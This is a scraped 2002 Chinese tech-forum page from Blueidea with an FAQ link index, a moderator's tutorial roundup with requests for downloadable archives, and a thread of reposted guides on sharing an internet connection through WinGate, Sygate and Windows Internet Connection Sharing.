http://www.blueidea.com/bbs/NewsDetail.asp?id=336206

由于工作需要想配台专业服务器。有过使用经验的请推荐推荐一下
http://www.blueidea.com/bbs/NewsDetail.asp?id=341211

各位用ADSL要不要拨号啊？
http://www.blueidea.com/bbs/NewsDetail.asp?id=338706

下载mp3
http://www.blueidea.com/bbs/NewsDetail.asp?id=340520

HTTB+Lan宽带的技术内幕？？？
http://www.blueidea.com/bbs/NewsDetail.asp?id=340303

什么是缓存加速服务,负载均衡服务？
http://www.blueidea.com/bbs/NewsDetail.asp?id=346373

远程访问别的地方的机子
http://www.blueidea.com/bbs/NewsDetail.asp?id=347754

高端路由和低端路由有什么区别？？？？？
http://www.blueidea.com/bbs/NewsDetail.asp?id=352830

win98下能不能安装并使用apache？
http://www.blueidea.com/bbs/NewsDetail.asp?id=354349

关于新闻组
http://www.blueidea.com/bbs/NewsDetail.asp?id=358439

9、输入法
怎么在中文WIN98下输入西班牙字
http://www.blueidea.com/bbs/NewsDetail.asp?id=321090

在WIN2000中五笔字形输入法如何加入
http://www.blueidea.com/bbs/NewsDetail.asp?id=320210

win2000的五笔加入
http://www.blueidea.com/bbs/NewsDetail.asp?id=326042

在windowsxp中有什么好的中文输入法么？
http://www.blueidea.com/bbs/NewsDetail.asp?id=334355

全角和半角有什么区别？
http://www.blueidea.com/bbs/NewsDetail.asp?id=318803

输入法经常乱，经常把紫光作为默认输入法！！
http://www.blueidea.com/bbs/NewsDetail.asp?id=332811

10、Linux

在LINUX中如何看局域网中WINDOWS机器上的东西?Samba服务
http://www.blueidea.com/bbs/NewsDetail.asp?id=314944

怎么装 Lilo
http://www.blueidea.com/bbs/NewsDetail.asp?id=343074

装过REDLINUX 7。2的都给我进来！！
http://www.blueidea.com/bbs/NewsDetail.asp?id=351987

中文编码标准，GB18030标准
http://www.blueidea.com/bbs/NewsDetail.asp?id=356231

12、其他
一个C的小问题
http://www.blueidea.com/bbs/NewsDetail.asp?id=326897
http://www.blueidea.com/bbs/NewsDetail.asp?id=328813

打印大号的字
http://www.blueidea.com/bbs/NewsDetail.asp?id=329447

zip文件的图标？
http://www.blueidea.com/bbs/NewsDetail.asp?id=333814

24M Ultimate IconCollection你见过的和没见过的大小图标，基本都有了
http://www.blueidea.com/bbs/NewsDetail.asp?id=347554

二进制，八进制，十进制，十六进制 他们之间怎么运算 怎么表达的呢
http://www.blueidea.com/bbs/NewsDetail.asp?id=354511

计算机编程的24条法则(转贴)
http://www.blueidea.com/bbs/NewsDetail.asp?id=356256

[这消息被嘿嘿编辑过(编辑时间2002-01-23 05:05:10)]

缘是天定,份在人为.
onlysnake

终级用户
积分：1971
发帖：696
来自：经典_流氓屯
注册：2002-01-10
 发表于 2002-02-09 21:25:25 按此观看onlysnake的个人资料 按此发邮件给onlysnake onlysnake 的 oicq 是24394523,查看 24394523 的资料 发送悄悄话给onlysnake 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看onlysnake的IP
好多东东呀，够经典！

我在天空写下你的名字，但是被风带走了；我在沙滩写下你的名字，但是被浪花带走了；于是，我在大街上的每个角落写下你的名字，…………·#！￥%—*+但是，我被警察带走了！！

Blueidea Counter Strike Team
=Blueidea=onlysnake

razor

初级用户
积分：30
发帖：15
来自：杭州
注册：2001-12-07
 发表于 2002-02-19 20:22:26 按此观看razor的个人资料 按此发邮件给razor 访问razor的主页 razor 的 oicq 是7605942,查看 7605942 的资料 发送悄悄话给razor 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看razor的IP
能不能打包下载啊,这可是好东东啊

我是Razor
枯网草

初级用户
积分：131
发帖：36
来自：
注册：2001-12-22
 发表于 2002-02-28 16:44:18 按此观看枯网草的个人资料 按此发邮件给枯网草 访问枯网草的主页 枯网草 的 oicq 是500467,查看 500467 的资料 发送悄悄话给枯网草 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看枯网草的IP
那为勤快写做一个CHM大家下载看不是更好

http://nefu.k666.com
lingduyu

初级用户
积分：125
发帖：34
来自：
注册：2001-04-03
 发表于 2002-04-02 14:27:51 按此观看lingduyu的个人资料 按此发邮件给lingduyu 发送悄悄话给lingduyu 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看lingduyu的IP
我非常同意楼上同志的想法！！我知道你很辛苦！但为什么不打包呢？能给个理由先吗？

我知道我又老又笨又多嘴....但我还是忍不住要问。
上一贴 | 下一贴
快速回复 | 主题：常见问题、问题集锦(一)(二)
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


教程及近期置顶文章汇总

计算机技术
教程及近期置顶文章汇总

上一贴 | 下一贴
发表人 主题: 教程及近期置顶文章汇总
啸

无意
现任版主
积分：5736
发帖：1962
来自：
注册：2000-08-01
 发表于 2002-02-08 19:33:56 按此观看啸的个人资料 按此发邮件给啸 收藏该主题供以后查看 发送悄悄话给啸 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看啸的IP
教程汇总：

感谢枯网草的chm文件： http://www.bjlu-an.com/heihei.zip

◇　win98 win200 共享上网全攻略....

◇　用网络命令来检验网络故障！

◇　BIOS详解

◇　关于系统崩溃，非法操作，大家都看看

◇　Windows XP选择 Pro还是 home～？

◇　注册表完全恢复手册

◇　boot.ini文件解释

◇　计算机启动过程详解(转)

◇　深入了解Win2000 引导与启动 （转）

◇　为什么只看见“欢迎使用”，却无法进入WIN XP？（答案）

◇　平定汉字乱码（转）

◇　多操作系统安装问与答

◇　Windows快捷键大全（转）

◇　IE相关反修改集粹

◇　Windows XP技巧十则

◇　如何用98启动盘安装2000和XP！（不会请进）

◇　win2k进程详解(转帖)

◇　Opera 6.0 浏览中文网页不再有困惑（转）

◇　关于windows的常见问题

◇　防止电脑死机二十五招（转）

◇　CHM格式电子书制作详解

◇　计算机编程的24条法则(转贴)

[这消息被啸编辑过(编辑时间2002-02-10 20:47:42)]
[这消息被啸编辑过(编辑时间2002-02-10 20:49:33)]
[这消息被啸编辑过(编辑时间2002-02-10 20:50:33)]
[这消息被啸编辑过(编辑时间2002-02-22 19:17:13)]
[这消息被啸编辑过(编辑时间2002-02-24 19:28:38)]
[这消息被啸编辑过(编辑时间2002-03-01 20:36:56)]
[这消息被啸编辑过(编辑时间2002-03-01 20:37:29)]
[这消息被啸编辑过(编辑时间2002-03-06 10:13:01)]
[这消息被啸编辑过(编辑时间2002-03-06 10:50:41)]
[这消息被啸编辑过(编辑时间2002-03-07 10:14:37)]
[这消息被啸编辑过(编辑时间2002-03-07 10:17:33)]
[这消息被啸编辑过(编辑时间2002-03-24 18:57:21)]
[这消息被啸编辑过(编辑时间2002-03-24 18:58:01)]
[这消息被啸编辑过(编辑时间2002-04-05 20:46:55)]
[这消息被啸编辑过(编辑时间2002-05-14 11:54:08)]
[这消息被啸编辑过(编辑时间2002-05-14 11:55:05)]

Blueidea Web Team.
Moderator Of Computer Technology Forum
洋葱

高级用户
积分：228
发帖：63
来自：
注册：2002-02-03
 发表于 2002-02-08 23:12:38 按此观看洋葱的个人资料 按此发邮件给洋葱 洋葱 的 oicq 是17484890,查看 17484890 的资料 发送悄悄话给洋葱 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看洋葱的IP
可以把这些教程打包，让朋友们下载吗？

我是一只菜菜鸟，不要嫌我麻烦啊~~~
onlysnake

终级用户
积分：1971
发帖：696
来自：经典_流氓屯
注册：2002-01-10
 发表于 2002-02-09 12:48:17 按此观看onlysnake的个人资料 按此发邮件给onlysnake onlysnake 的 oicq 是24394523,查看 24394523 的资料 发送悄悄话给onlysnake 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看onlysnake的IP
绝大部分都很经典，很好，很好，希望以后多发这种总结性的帖子！

请别用红色的大字，对自己的尊重也是对别人的尊重，谢谢你的配合
donger

[这消息被donger编辑过(编辑时间2002-02-09 12:51:36)]

我在天空写下你的名字，但是被风带走了；我在沙滩写下你的名字，但是被浪花带走了；于是，我在大街上的每个角落写下你的名字，…………·#！￥%—*+但是，我被警察带走了！！

Blueidea Counter Strike Team
=Blueidea=onlysnake

apple

初级用户
积分：81
发帖：39
来自：bj
注册：2000-06-21
 发表于 2002-02-21 11:27:13 按此观看apple的个人资料 按此发邮件给apple 发送悄悄话给apple 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看apple的IP
希望最好整理一下，做成chm下载，要不提供打包下载

一颗苹果~~
啸

无意
现任版主
积分：5736
发帖：1962
来自：
注册：2000-08-01
 发表于 2002-02-22 19:19:36 按此观看啸的个人资料 按此发邮件给啸 发送悄悄话给啸 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看啸的IP
因为文章还在不断的添入当中，所以暂时还不打算制作chm
希望大家原创或转了什么好的教程，跟个贴在这里，以便我们及时的添加进去，让更多的朋友分享。

Blueidea Web Team.
Moderator Of Computer Technology Forum
3dlover

初级用户
积分：12
发帖：3
来自：gd
注册：2002-02-23
 发表于 2002-02-23 11:24:32 按此观看3dlover的个人资料 按此发邮件给3dlover 3dlover 的 oicq 是70799327,查看 70799327 的资料 发送悄悄话给3dlover 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看3dlover的IP
这么好的总结性文章，最好提供一个ZIP供大家下载，谢谢先.

最近的你是我最近的痛
啸

无意
现任版主
积分：5736
发帖：1962
来自：
注册：2000-08-01
 发表于 2002-02-23 17:17:21 按此观看啸的个人资料 按此发邮件给啸 发送悄悄话给啸 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看啸的IP
http://www.blueidea.com/user/ss/doc.zip (800K)

由于这里的上网条件限制，只能做到这样了，对不起大家，以后一定补上。

Blueidea Web Team.
Moderator Of Computer Technology Forum
枯网草

初级用户
积分：131
发帖：36
来自：
注册：2001-12-22
 发表于 2002-02-28 17:12:39 按此观看枯网草的个人资料 按此发邮件给枯网草 访问枯网草的主页 枯网草 的 oicq 是500467,查看 500467 的资料 发送悄悄话给枯网草 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看枯网草的IP
http://www.bjlu-an.com/heihei.zip
嘿嘿~~~

[这消息被枯网草编辑过(编辑时间2002-02-28 17:17:50)]

http://nefu.k666.com
啸

无意
现任版主
积分：5736
发帖：1962
来自：
注册：2000-08-01
 发表于 2002-03-01 10:37:40 按此观看啸的个人资料 按此发邮件给啸 发送悄悄话给啸 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看啸的IP
还是chm文件的，辛苦枯网草了，谢谢

Blueidea Web Team.
Moderator Of Computer Technology Forum
loverty

初级用户
积分：16
发帖：5
来自：河南
注册：2001-06-24
 发表于 2002-03-05 13:57:44 按此观看loverty的个人资料 按此发邮件给loverty 访问loverty的主页 loverty 的 oicq 是38930198,查看 38930198 的资料 发送悄悄话给loverty 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看loverty的IP
这个教程真是不错呀!

loverty
消却心中壁垒冰兢，眼前时有风清月来。

wzka

初级用户
积分：49
发帖：24
来自：中国湖北省
注册：2000-06-30
 发表于 2002-03-28 15:57:18 按此观看wzka的个人资料 按此发邮件给wzka wzka 的 oicq 是1452949,查看 1452949 的资料 发送悄悄话给wzka 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看wzka的IP
要是能打包就好了

多谢各位的帮忙
啸

无意
现任版主
积分：5736
发帖：1962
来自：
注册：2000-08-01
 发表于 2002-03-28 16:10:32 按此观看啸的个人资料 按此发邮件给啸 发送悄悄话给啸 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看啸的IP
wzka在上个帖子中说
引用:
要是能打包就好了

不是有了吗？
http://www.bjlu-an.com/heihei.zip

Blueidea Web Team.
Moderator Of Computer Technology Forum
小安

初级用户
积分：147
发帖：43
来自：
注册：2002-03-08
 发表于 2002-03-29 19:23:11 按此观看小安的个人资料 按此发邮件给小安 发送悄悄话给小安 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看小安的IP
我的是枯网草！我的名字丢失却找不回来了！信箱也丢失！呜呼~~~~~~~~~
能帮我去找找名字不？
一块两毛五

初级用户
积分：147
发帖：40
来自：
注册：2002-03-18
 发表于 2002-04-11 18:16:18 按此观看一块两毛五的个人资料 按此发邮件给一块两毛五 发送悄悄话给一块两毛五 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看一块两毛五的IP
这个教程太好了
linyifei2000

超级用户
积分：426
发帖：172
来自：Canada
注册：2002-05-02
 发表于 2002-05-08 11:17:55 按此观看linyifei2000的个人资料 按此发邮件给linyifei2000 访问linyifei2000的主页 linyifei2000 的 oicq 是34192942,查看 34192942 的资料 发送悄悄话给linyifei2000 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看linyifei2000的IP
枯网草兄做的Chm小弟这边下不了，所以自己就做了个exe的，和大家share，我想做的一定没有草兄好，等什么时候啸兄说可以做个详细的了，小弟一定尽力而为，这个做得比较简单，但是大家看的是内容，不是字体，呵呵,避免喧宾夺主。
点此下载：经典教程

大海呀，全是水；骏马呀，四条腿；吃饭呀，要用嘴；小便呀，叉开腿…… %*&^%^&%^&%^%^^&*
啸

无意
现任版主
积分：5736
发帖：1962
来自：
注册：2000-08-01
 发表于 2002-05-08 16:42:21 按此观看啸的个人资料 按此发邮件给啸 发送悄悄话给啸 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看啸的IP
linyifei2000在上个帖子中说
引用:
枯网草兄做的Chm小弟这边下不了

可以试试这个能不能下

http://www.blueidea.com/user/ss/heihei.zip

p.s. 能把你做的发给我一份吗，我这边无法运行，我的信箱是 wuyi@blueidea.com

谢谢你对经典和计算机版的支持

Blueidea Web Team.
Moderator Of Computer Technology Forum
wxw

初级用户
积分：39
发帖：14
来自：陕西省延安市
注册：2002-04-29
 发表于 2002-05-11 11:09:08 按此观看wxw的个人资料 按此发邮件给wxw 发送悄悄话给wxw 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看wxw的IP
看到你的贴子，让我充实了很多，希望以后多发些知道和学习方面的信息和方法，成为你忠实读者。您的帮助是我的进步。[/html][html]

Alsa
linyifei2000

超级用户
积分：426
发帖：172
来自：Canada
注册：2002-05-02
 发表于 2002-05-11 12:55:08 按此观看linyifei2000的个人资料 按此发邮件给linyifei2000 访问linyifei2000的主页 linyifei2000 的 oicq 是34192942,查看 34192942 的资料 发送悄悄话给linyifei2000 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看linyifei2000的IP
楼上的，你再说谁呀？在下可大言不惭的感觉是我了

大海呀，全是水；骏马呀，四条腿；吃饭呀，要用嘴；小便呀，叉开腿…… %*&^%^&%^&%^%^^&*
herolw

高级用户
积分：216
发帖：61
来自：中国湖北
注册：2002-05-14
 发表于 2002-05-15 15:50:04 按此观看herolw的个人资料 按此发邮件给herolw herolw 的 oicq 是8978729,查看 8978729 的资料 发送悄悄话给herolw 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看herolw的IP
我有几篇好的东西，不知道怎么贴出来给大家。

了却君王天下事，赢得生前身后名。
啸

无意
现任版主
积分：5736
发帖：1962
来自：
注册：2000-08-01
 发表于 2002-05-15 16:41:34 按此观看啸的个人资料 按此发邮件给啸 发送悄悄话给啸 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看啸的IP
有图片吗，如果没图片的直接发新帖贴就行，如果有，可以打包发给我，我替你把图片贴上

E-mail: wuyi@blueidea.com

Blueidea Web Team.
Moderator Of Computer Technology Forum
上一贴 | 下一贴
快速回复 | 主题：教程及近期置顶文章汇总
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


win98 win200 共享上网全攻略....

计算机技术
win98 win200 共享上网全攻略....

上一贴 | 下一贴
发表人 主题: win98 win200 共享上网全攻略....
yunbin

经典强盗
现任版主
积分：2292
发帖：1001
来自：火星
注册：2001-09-27
 发表于 2002-04-12 16:39:48 按此观看yunbin的个人资料 按此发邮件给yunbin 访问yunbin的主页 yunbin 的 oicq 是2369009,查看 2369009 的资料 收藏该主题供以后查看 发送悄悄话给yunbin 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yunbin的IP
近来好像有挺多的人问这个...........

WinGate和Internet共享的最佳配合<--------Click here

Windows 2000共享上网的设置<--------Click here

Windows 98SE共享上网的设置<--------Click here

Win2000用ADSL共享上网的设置<--------Click here

Sygate 4.0共享上网的设置<--------Click here

Wingate 4.3.0共享上网的设置 <--------Click here

[这消息被yunbin编辑过(编辑时间2002-04-12 16:44:53)]

A man can succeed at almost anything
for which he has unlimited enthusiasm.

Blueidea Web Team
Moderator Of Computer Technology Forum

啸

无意
现任版主
积分：5736
发帖：1962
来自：
注册：2000-08-01
 发表于 2002-04-12 20:39:40 按此观看啸的个人资料 按此发邮件给啸 发送悄悄话给啸 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看啸的IP
太好了，谢谢yunbin，简直就是及时雨

Blueidea Web Team.
Moderator Of Computer Technology Forum
foolishdog

终级用户
积分：672
发帖：177
来自：阳光数据中文网
注册：2001-08-16
 发表于 2002-04-14 14:18:41 按此观看foolishdog的个人资料 该用户不允许显示它的电子邮件 foolishdog 的 oicq 是84357477,查看 84357477 的资料 发送悄悄话给foolishdog 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看foolishdog的IP
是呀~~ 学到好多东西！

设计就是灵感的实物！
灵感是设计的动力！
cutwater

初级用户
积分：4
发帖：6
来自：辽宁
注册：2002-04-11
 发表于 2002-04-15 01:46:04 按此观看cutwater的个人资料 该用户不允许显示它的电子邮件 cutwater 的 oicq 是99838851,查看 99838851 的资料 发送悄悄话给cutwater 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看cutwater的IP
多谢，多谢，我正找这东东呢，Thank you！！！
epie

超级用户
积分：354
发帖：98
来自：
注册：2001-09-14
 发表于 2002-04-18 20:46:23 按此观看epie的个人资料 按此发邮件给epie epie 的 oicq 是1491135,查看 1491135 的资料 发送悄悄话给epie 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看epie的IP
我也好想看一些这个东西
怎么我打不开你那网页呢？
麻烦下载的朋友给我的email发一份，不甚感激

我找周润发！
这是经典论坛吗？麻烦你帮我找一下周润发！！
樱

终级用户
积分：1308
发帖：401
来自：▓★☆★☆★▓
注册：2000-12-11
 发表于 2002-04-24 09:38:00 按此观看樱的个人资料 该用户不允许显示它的电子邮件 发送悄悄话给樱 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看樱的IP
不错
正要用wingate呢

18J
[w]
冷语

Fierce
现任版主
积分：13250
发帖：5007
来自：BeiJing
注册：2001-03-06
 发表于 2002-04-26 00:50:52 按此观看冷语的个人资料 按此发邮件给冷语 冷语 的 oicq 是6577192,查看 6577192 的资料 发送悄悄话给冷语 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看冷语的IP
无法显示网页
您要访问的网页有问题，无法显示。

--------------------------------------------------------------------------------

请尝试以下操作:

打开 soft.km169.net 主页，然后查找指向您感兴趣信息的链接。
单击刷新按钮，或以后再试。

单击搜索，寻找 Internet 上的信息。
也可查看相关站点列表。

HTTP 500 - 内部服务器错误
Internet Explorer

[ Come As You Are ]

Blueidea Web Team
Moderator Of Flash forum

yunbin

经典强盗
现任版主
积分：2292
发帖：1001
来自：火星
注册：2001-09-27
 发表于 2002-04-26 08:24:58 按此观看yunbin的个人资料 按此发邮件给yunbin 访问yunbin的主页 yunbin 的 oicq 是2369009,查看 2369009 的资料 发送悄悄话给yunbin 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yunbin的IP
冷语在上个帖子中说
引用:
无法显示网页
您要访问的网页有问题，无法显示。

--------------------------------------------------------------------------------

请尝试以下操作:

打开 soft.km169.net 主页，然后查找指向您感兴趣信息的链接。
单击刷新按钮，或以后再试。

单击搜索，寻找 Internet 上的信息。
也可查看相关站点列表。

HTTP 500 - 内部服务器错误
Internet Explorer

我都可以打开....

A man can succeed at almost anything
for which he has unlimited enthusiasm.

Blueidea Web Team
Moderator Of Computer Technology Forum

fanbl

终级用户
积分：2057
发帖：563
来自：
注册：2002-03-20
 发表于 2002-04-27 11:39:35 按此观看fanbl的个人资料 按此发邮件给fanbl 访问fanbl的主页 发送悄悄话给fanbl 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看fanbl的IP
为什么我的机器,主机IP设为192.168.0.1后.其它机器不设IP可共享上网.如果其它机器设了IP如192.168.0.2等后不能共享上网.不论是win98,winxp还是win2k我都试过.都是这样.为什么呀?

我是菜鸟请多关照
Photo

高级用户
积分：197
发帖：94
来自：InterNet
注册：2000-07-08
 发表于 2002-04-29 17:46:28 按此观看Photo的个人资料 该用户不允许显示它的电子邮件 访问Photo的主页 Photo 的 oicq 是2403436,查看 2403436 的资料 发送悄悄话给Photo 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看Photo的IP
考~~HTTP 500 - 内部服务器错误

[img]http://eddyshow.com/icons/462.gif[/img]
[img]http://go6.163.com/zy3483/pig.gif[/img]
啸

无意
现任版主
积分：5736
发帖：1962
来自：
注册：2000-08-01
 发表于 2002-04-30 21:47:27 按此观看啸的个人资料 按此发邮件给啸 发送悄悄话给啸 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看啸的IP
算了，我还是转过来吧，别人骂就骂吧.后面两篇图太多了，不好转。

WinGate和Internet连接共享的最佳配合

http://soft.km169.net/soft/tip/sharegate.htm

原作者: 冯健

提起共享上网来，很多人都会想到WinGate，该软件最大的优点是：通过缓存网页内容，加快了浏览速度。然而，很多用户发现在WinGate的配置很麻烦，想要使用QQ、Foxmail、网络蚂蚁、网际快车、CuteFTP等软件不下一番功夫还真不行！而且，光设置好服务器还不行，客户机也要做相应的设置，非常麻烦。如何才能即利用WinGate的缓存，加快浏览速度，又不用进行复杂的配置呢？在建设恩平电大校园网的过程中，我们找到一个好办法：WinGate和Windows自带的连接共享的合用。具体做法如下：

1、安装“Internet连接共享”
安装之前，请确认你的局域网是连通的，并准备好一张软盘。Windows的“Internet连接共享”安装过程比较简单，按照提示操作即可。如果系统里没有“Internet连接共享”，可以通过“添加/删除程序→Windows组件→Internet工具”进行添加。

2、安装WinGate
软件的安装比较简单，一路回车即可，这里就不多介绍了。服务器使用Windows 2000或Windows 98都可以，要注意的是，不同的操作系统需要安装对应版本的WinGate。

3、WinGate的配置
进入WinGate的使用界面后，主要设置一下WinGate的缓存属性，缓存的大小设置为不小于500MB即可使用。

4、IE浏览器的配置
运行IE浏览器，打开Internet选项，进行局域网设置，设置如图2，这里我们的服务器的IP地址为192.168.0.1，端口为80，确定回车。

配置完毕后，我们即可同时运行WinGate和Windows的连接共享来完成代理服务器的功能。使用中将两者放入启动目录，服务器打开即可运行使用。现在我们可以在Internet中使用QQ、Foxmail、CuteFTP、网络蚂蚁等软件了。此时，服务器利用WinGate为客户机提供网页的浏览服务，而通过Windows自带的连接共享为客户机提供QQ、邮件、上传、下载等服务。因此我们在使用中不但能享受上网冲浪的快捷，也避免了许多不必要的设置。

还有一点必须注意，如果你的服务器在单位中还担当局域网的Web服务器、FTP 服务器、邮件服务器的话，如使用Windows 2000的IIS 5.0，安装WinGate后，你会发现局域网的FTP和局域网电子邮件无法使用，别着急，完成以下配置后即可使用。

1、运行服务器的WinGate，删除WinGate中的除WWW Proxy Server服务器外的所有用户服务器。

2、改变WinGate中WWW Proxy Server的端口为8080。

3、最后参照前面IE浏览器的Internet选项中局域网设置的方法，将客户机的端口改为8080即可。

通过以上设置可以使用你们单位以前的各种局域网服务功能了。朋友，怎么样，想试试请赶快动手吧

利用Win 2K实现Internet连接共享

http://soft.km169.net/soft/tip/w2kshare.htm

    上个月公司联网了，要求所有用户计算机通过服务器共享Internet连接。对于我这个网管来说，迫切需要实现Http、Ftp、POP3、Smtp等功能，同时同事还要我给他们开通Oicq，以便休息时间可以聊天。

    用什么代理工具好呢？这颇费了我一番时间研究，常用的代理软件有MS Proxy 2.0、Wingate、Sygate等等。MS Proxy 2.0和Wingate配置太过复杂，而且还要在客户端安装软件，先被否决了。去临近的单位考察了一下Sygate 4.0，发现很不错，已经初步决定用Sygate 4了。转折点是前两天为了提高服务器的稳定性，把服务器重新安装了一遍，升级成为Win2000服务器版。

    在阅读Win2000帮助信息时，无意中发现Win2000自带了Internet连接共享功能，试用以后发现真的不错，Http、Ftp、POP3、Smtp和Oicq等功能都能实现。不敢独享，和大家共同探讨一下。

    一．服务器上Win2000的安装配置

    1.Win2000使用典型安装完毕，配置为主域服务器。并配置网卡的ip为192.168.0.1，子网为255.255.255.0，将此网卡连接到服务器所在的网络，使用TCP/IP协议。在现有的网络中，不应该将此功能与其他 Windows 2000 Server 域控制器、DNS 服务器、网关、DHCP 服务器，或配置为静态 IP 地址的系统一起使用。

    2.添加域名服务系统（DNS）
    通过 控制面板－>添加删除程序－>网络服务－>域名服务系统（DNS）－>打勾－>确定来添加。如图所示：

    二．服务器上添加连接到Internet的连接

    我目前是通过服务器端modem拨号上网的方式来实现的。要注意的是配置 Internet 连接共享，必须以 Administrators 组的成员来登录服务器。

    1.安装modem

    通过 控制面板－>电话和调制解调器选项－>添加 来添加外置modem

    2.添加拨号连接

    通过 控制面板－>网络和拨号连接选项－>新建新连接－>出现网络连接向导

    在网络连接向导中选－>单击"下一步"－>选拨号到Internet－>单击"下一步"－>出现Internet连接向导。

    在Internet连接向导中－>选手动设置Internet连接或通过局域网连接－>单击"下一步"－>通过电话线和调制解调器连接-->单击"下一步"-->输入ISP提供的上网电话号码-->单击"下一步"－>输入ISP提供的用户名和密码-->单击"下一步"－>单击"下一步"－>问是否建立邮件帐号时选否－>单击"下一步"－>完成。

    3. 共享Internet的连接

    在新建立的拨号连接帐号上点击右键-->选属性-->共享访问-->在"启动此连接的Internet连接共享"打勾-->确定。

    三、在服务器和客户机器上配置Internet连接共享的Internet选项

    1.打开 Internet Explorer-->单击"手工设置 Internet 连接，或者通过局域网 (LAN) 连接"，-->单击"下一步" --> "通过局域网 (LAN) 连接" -->单击"下一步"--> 单击"自动查找代理服务器（推荐）"复选框-->单击"下一步" -->单击"否" -->单击"下一步"" -->单击"完成"。
    2.在"连接"选项卡上，单击"不进行拨号连接"，然后单击"局域网设置"。
    3.在"自动配置"中，清除"自动检测设置"和"使用自动配置脚本"复选框。
    4.在"代理服务器"中，清除"使用代理服务器"复选框。

    四、在客户机上设置网卡配置

    配置客户机的网卡为自动获得IP地址，网关为空。
    到此配置完毕，重新启动服务器和客户机。服务器上拨号上网，在客户机上登录服务器后，就可以通过服务器的代理实现各种Internent功能了。

Win98SE的Internet共享！

http://soft.km169.net/soft/tip/winshare.htm

在Win98SE没有出现以前，大家都在使用Sygate、Wingate等网关工具来实现上网共享。Win98SE（第二版）本身也包含了共享上网工具——“Internet连接共享”，它的功能虽不如Wingate等软件来得强大，但却非常实用。

    在使用之前，大家必须先配置好自己的局域网，注意这个局域网必须是建立在TCP/IP协议的基础上，用IPX/SPX协议无法实现Internet共享功能，配置的局域网可ping一下主机的IP地址和本地的IP地址，以检查局域网是否工作正常（主机和本地的IP地址可由winipcfg这个命令得到）。

    一、主机的安装

    “Internet连接共享”主机上必须安装下述组件：

    Microsoft网络用户

    Internet连接共享

    拨号适配器（Internet适配器）

    第二个网络适配器（本地网卡）

    “Internet连接共享”和本地适配器的TCP/IP

    Internet连接共享需要最后安装，等一切设置好，并且设立了拨号连接，而且最好选择保存口令选项后，最后再装Internet连接共享。

    1.安装Internet连接共享

    打开“Windows安装程序”选项卡下的“添加/删除程序属性”对话框。

    单击“Internet工具”，然后单击“详细资料”。

    选择“Internet连接共享”，然后单击“确定”。

